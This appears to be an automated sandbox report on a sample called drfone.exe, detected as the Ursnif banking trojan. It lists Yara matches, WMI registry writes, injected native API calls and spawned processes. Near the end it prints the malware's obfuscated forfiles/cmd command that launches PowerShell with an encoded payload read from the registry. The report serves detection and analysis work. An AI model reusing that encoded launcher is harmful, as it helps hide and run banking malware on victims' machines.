Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\drfone.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0881CC NtCreateKey, 32_2_00000276DE0881CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08545C NtQueryInformationToken,NtQueryInformationToken, 32_2_00000276DE08545C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE085290 NtOpenFile, 32_2_00000276DE085290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08590C NtQueryInformationProcess,NtSuspendProcess,NtResumeProcess,NtUnmapViewOfSection, 32_2_00000276DE08590C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE089368 NtCreateSection, 32_2_00000276DE089368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08376C NtQueryInformationProcess, 32_2_00000276DE08376C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE088D78 CheckRemoteDebuggerPresent,NtSetInformationProcess, 32_2_00000276DE088D78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08118C NtMapViewOfSection, 32_2_00000276DE08118C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0815A4 NtQueryInformationProcess,NtWriteVirtualMemory, 32_2_00000276DE0815A4
Source: C:\Windows\explorer.exe Code function: 39_2_0280645C NtQueryInformationToken,NtQueryInformationToken, 39_2_0280645C
Source: C:\Windows\explorer.exe Code function: 39_2_028170B6 NtProtectVirtualMemory,NtProtectVirtualMemory, 39_2_028170B6
Source: C:\Windows\explorer.exe Code function: 39_2_02986094 NtProtectVirtualMemory, 39_2_02986094
Source: C:\Windows\explorer.exe Code function: 39_2_029838B0 NtQueryValueKey,NtQueryValueKey, 39_2_029838B0
Source: C:\Windows\explorer.exe Code function: 39_2_0298B438 NtSetValueKey,NtClose, 39_2_0298B438
Source: C:\Windows\explorer.exe Code function: 39_2_029891CC NtCreateKey,RtlpNtOpenKey, 39_2_029891CC
Source: C:\Windows\explorer.exe Code function: 39_2_0298476C NtQueryInformationProcess, 39_2_0298476C
Source: C:\Windows\explorer.exe Code function: 39_2_02DB1B94 NtQuerySystemInformation,RtlReleasePrivilege,RtlAllocateHeap, 39_2_02DB1B94
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08DE18 32_2_00000276DE08DE18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08545C 32_2_00000276DE08545C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0815A4 32_2_00000276DE0815A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0901E2 32_2_00000276DE0901E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0811E8 32_2_00000276DE0811E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08C818 32_2_00000276DE08C818
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE087A8C 32_2_00000276DE087A8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE0878B0 32_2_00000276DE0878B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE087100 32_2_00000276DE087100
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE085F58 32_2_00000276DE085F58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE08E998 32_2_00000276DE08E998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD4413 32_2_00007FFD02CD4413
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00007FFD02CD30F0 32_2_00007FFD02CD30F0
Source: C:\Windows\explorer.exe Code function: 39_2_00AA1CE8 39_2_00AA1CE8
Source: C:\Windows\explorer.exe Code function: 39_2_00AA2618 39_2_00AA2618
Source: C:\Windows\explorer.exe Code function: 39_2_00AA3FFC 39_2_00AA3FFC
Source: C:\Windows\explorer.exe Code function: 39_2_00AA4D34 39_2_00AA4D34
Source: C:\Windows\explorer.exe Code function: 39_2_00AA1474 39_2_00AA1474
Source: C:\Windows\explorer.exe Code function: 39_2_0280645C 39_2_0280645C
Source: C:\Windows\explorer.exe Code function: 39_2_02808A8C 39_2_02808A8C
Source: C:\Windows\explorer.exe Code function: 39_2_028088B0 39_2_028088B0
Source: C:\Windows\explorer.exe Code function: 39_2_0280D818 39_2_0280D818
Source: C:\Windows\explorer.exe Code function: 39_2_0280EE18 39_2_0280EE18
Source: C:\Windows\explorer.exe Code function: 39_2_0280F998 39_2_0280F998
Source: C:\Windows\explorer.exe Code function: 39_2_028025A4 39_2_028025A4
Source: C:\Windows\explorer.exe Code function: 39_2_028021E8 39_2_028021E8
Source: C:\Windows\explorer.exe Code function: 39_2_02808100 39_2_02808100
Source: C:\Windows\explorer.exe Code function: 39_2_02806F58 39_2_02806F58
Source: C:\Windows\explorer.exe Code function: 39_2_02822E4C 39_2_02822E4C
Source: C:\Windows\explorer.exe Code function: 39_2_02988A8C 39_2_02988A8C
Source: C:\Windows\explorer.exe Code function: 39_2_029888B0 39_2_029888B0
Source: C:\Windows\explorer.exe Code function: 39_2_0298D818 39_2_0298D818
Source: C:\Windows\explorer.exe Code function: 39_2_0298EE18 39_2_0298EE18
Source: C:\Windows\explorer.exe Code function: 39_2_0298645C 39_2_0298645C
Source: C:\Windows\explorer.exe Code function: 39_2_0298F998 39_2_0298F998
Source: C:\Windows\explorer.exe Code function: 39_2_029825A4 39_2_029825A4
Source: C:\Windows\explorer.exe Code function: 39_2_029821E8 39_2_029821E8
Source: C:\Windows\explorer.exe Code function: 39_2_02988100 39_2_02988100
Source: C:\Windows\explorer.exe Code function: 39_2_02986F58 39_2_02986F58
Source: C:\Windows\explorer.exe Code function: 39_2_02DB58F4 39_2_02DB58F4
Source: C:\Windows\explorer.exe Code function: 39_2_02DBC2BC 39_2_02DBC2BC
Source: C:\Windows\explorer.exe Code function: 39_2_02DBD85C 39_2_02DBD85C
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2008 39_2_02DB2008
Source: C:\Windows\explorer.exe Code function: 39_2_02DBAE0C 39_2_02DBAE0C
Source: C:\Windows\explorer.exe Code function: 39_2_02DBCDCC 39_2_02DBCDCC
Source: C:\Windows\explorer.exe Code function: 39_2_02DBB7E8 39_2_02DBB7E8
Source: C:\Windows\explorer.exe Code function: 39_2_02DBD760 39_2_02DBD760
Source: C:\Windows\explorer.exe Code function: 39_2_02DBA914 39_2_02DBA914
PE / OLE file has an invalid certificate
Source: drfone.exe Static PE information: invalid certificate
PE file does not import any functions
Source: r1g0ykja.dll.36.dr Static PE information: No import functions for PE file found
Source: xqhvpwja.dll.33.dr Static PE information: No import functions for PE file found
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@38/75@15/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{62186B86-460C-11EB-90E5-ECF4BB2D2496}.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{AAEAB402-F749-8C7A-9884-AA0F7D514646}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\Users\user\Desktop\drfone.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\1978EE24-ED7A-8F95-C655-46BAE5CC03A0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFA3603797F71A738A.TMP Jump to behavior
Source: drfone.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: drfone.exe ReversingLabs: Detection: 14%
Source: unknown Process created: C:\Users\user\Desktop\drfone.exe 'C:\Users\user\Desktop\drfone.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17416 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82954 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17426 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82958 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4704 CREDAT:17434 /prefetch:2
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start /min forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
